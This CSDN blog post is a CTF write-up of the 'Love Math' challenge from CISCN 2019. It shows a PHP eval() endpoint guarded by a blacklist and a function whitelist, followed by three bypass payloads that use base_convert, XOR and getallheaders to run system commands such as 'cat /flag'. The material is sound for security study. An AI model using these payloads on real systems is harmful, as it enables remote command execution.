审计练习11——[CISCN 2019 初赛]Love Math

最新推荐文章于 2024-05-05 02:50:49 发布
最新推荐文章于 2024-05-05 02:50:49 发布
阅读量271 收藏
点赞数
分类专栏: CTF write up 代码审计 文章标签: php 正则表达式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43756333/article/details/106525564
版权

平台:buuoj.cn
打开靶机源码如下

<?php
error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
}

$content限制了长度
$blacklist过滤了一些字符
$whitelist过滤了一些单词

前置知识

base_convert() 函数:在任意进制之间转换数字。
dechex() 函数:把十进制转换为十六进制。
hex2bin() 函数:把十六进制值的字符串转换为 ASCII 字符。

解题

一、

payload:
?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=ls%20/

分段看

base_convert(37907361743,10,36) = hex2bin
dechex(1598506324) = 5f474554
hex2bin('5f474554') = _GET
($$pi){pi}(($$pi){abs}) = $_GET{pi}($_GET{abs})
($$pi){pi}(($$pi){abs})&pi=system&abs=cat%20/flag => $_GET{system}($_GET{cat%20/flag})=>system('cat%20/flag')

二、

?c=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{pi}($pi{abs})&0=system&1=cat%20/flag

(is_nan^(6).(4)).(tan^(1).(5)) = _GET
($$pi){pi}(($$pi){abs}) = $_GET{pi}($_GET{abs})
($$pi){pi}(($$pi){abs})&pi=system&abs=cat%20/flag => $_GET{system}($_GET{cat%20/flag})=>system('cat%20/flag')

关于PHP Math 函数
可用

<?php
$payload = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh',  'bindec', 'ceil', 'cos', 'cosh', 'decbin' , 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
for($k=1;$k<=sizeof($payload);$k++){
    for($i = 0;$i < 9; $i++){
        for($j = 0;$j <=9;$j++){
            $exp = $payload[$k] ^ $i.$j;
            echo($payload[$k]."^$i$j"."==>$exp");
            echo "       ";
        }
    }
}
?>

可对应查询相关字符
三、

$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})

$pi(696468,10,36) = exec
$pi(8768397090111664438,10,30) = getallheaders
$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1}) = exec(getallheaders(){1})

getallheaders — 获取全部 HTTP 请求头信息

在这里插入图片描述
抓包重放
在请求头加上cat /flag
在这里插入图片描述

hui________
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[CISCN 2019初赛]Love Math - RCE(异或绕过)
oZuoShen123的博客
10-11 352
//听说你很喜欢数学,不知道你是否它胜过flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); } $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]
BUU刷题记录——5
weixin_43610673的博客
09-21 1502
October 2019 Twice SQL Injection 由题目名可知为二次注入 username =1' union select database() # username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # username =1' union select group
2024全国职业技能大赛-网络安全赛题解析总结⑨(超详细)_2024网鼎杯网络安全大赛题库(1)
最新发布
2401_84240129的博客
05-05 1004
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
[CISCN 2019 初赛]Love Math
feng的博客
11-18 730
前言 还是在buuctf上做题,做到了这个国赛的题目,感觉自己还是太菜了,创造力少的可怜,一点基本的对知识的运用能力都没有,还是要加油啊。 WP 进入环境进行代码审计: <?php error_reporting(0); //听说你很喜欢数学,不知道你是否它胜过flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen
buuctf-[CISCN 2019 初赛]Love Math(小宇特详解)
小宇的web博客
02-26 2790
buuctf-[CISCN 2019 初赛]Love Math(小宇特详解) 1.先看题目 <?php error_reporting(0); //听说你很喜欢数学,不知道你是否它胜过flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 578
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
2019CSP-S A卷初赛真题及答案.docx
10-20
2019 CSP-S 初赛】是中国计算机学会(CCF)组织的计算机软件能力认证的一环,主要面向中学生进行,旨在检验参赛者的计算机程序设计能力。CSP-S,全称为“Certified Software Professional - Software”,是针对...
2019CSP-S-提高组初赛
08-24
2019CSP-S-提高组初赛
2019-CSP-J-普及组初赛
06-10
2019-CSP-J-普及组初赛
2019华为网络精英大赛初赛自测习题
04-11
资料总结了官方给的资料的习题总结,完善的列了出来,并且有正确答案,仅供参考。
2019 CSP-S 初赛试题与解析(2020.09.20).rar
09-20
标题中的“2019 CSP-S 初赛试题与解析(2020.09.20).rar”指的是中国计算机学会(CCF)在2019年举行的计算机软件能力认证(CSP)-S级别的初赛试题及官方解析合集,该合集在2020年9月20日被整理成RAR格式的压缩包...
[网鼎杯 2020 朱雀组]phpweb&[BJDCTF2020]The mystery of ip
weixin_46133275的博客
09-01 93
本文主要记录[网鼎杯 2020 朱雀组]phpweb和[BJDCTF2020]The mystery of ip的解题过程和相关思路。
[网鼎杯 2020 青龙组]singal 1
qq_24481913的博客
12-01 501
在主函数中找到了一个vm的译码器,译码器主要是解释传入的opcode,然后对我们输入的字符操作,这里我们发现他是单字节比较的,方法很多可以使用单字节映射,也可以是使用符号化执行,当然也可以硬着头皮去看。
[WP/Buu/RCE]-[CISCN 2019 初赛]Love Math
車鈊的博客
08-08 182
[CISCN 2019 初赛]Love Math 源码 <?php error_reporting(0); //听说你很喜欢数学,不知道你是否它胜过flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); }
[网鼎杯 2020 朱雀组]phpweb
2301_76896268的博客
10-31 147
[网鼎杯 2020 朱雀组]phpweb的题解以及一些自己的学习分享
[网鼎杯 2020 朱雀组]Nmap 通过nmap写入木马 argcmd过滤实现逃逸
m0_64180167的博客
09-19 352
这道题也很好玩 啊 原本以为是ssrf 或者会不会是rce结果是通过nmap写入木马我们来玩一下。
2022网鼎杯半决赛复盘
龙狼刺的博客
07-12 1699
该靶场为2022 第三届网鼎杯决赛内网靶场复盘。完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4个flag,分布于不同的靶机。
nssctf web 入门(7)
qq_61988806的博客
04-17 548
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10篇。
mysql %3cforeach_RCTF 2020 Writeup
weixin_29119497的博客
01-27 2315
来啦!今天也是活力满满的工作日小编WEBcalc解题思路error_reporting ( 0 );if(!isset( $_GET [ 'num' ])){show_source ( __FILE__ );}else{$str = $_GET [ 'num' ];$blacklist = [ '[a-z]' , '[\x7f-\xff]' , '\s' , "'" , '"' , ...
[ciscn 2019 初赛]love math
03-16
这道题目需要我们求出一个数列中所有数的最大公约数。我们可以使用欧几里得算法来求解。具体来说,我们可以用辗转相除的方法,不断将两个数中较大的数除以较小的数,直到两个数相等为止,此时的数即为它们的最大公...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

hui________

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值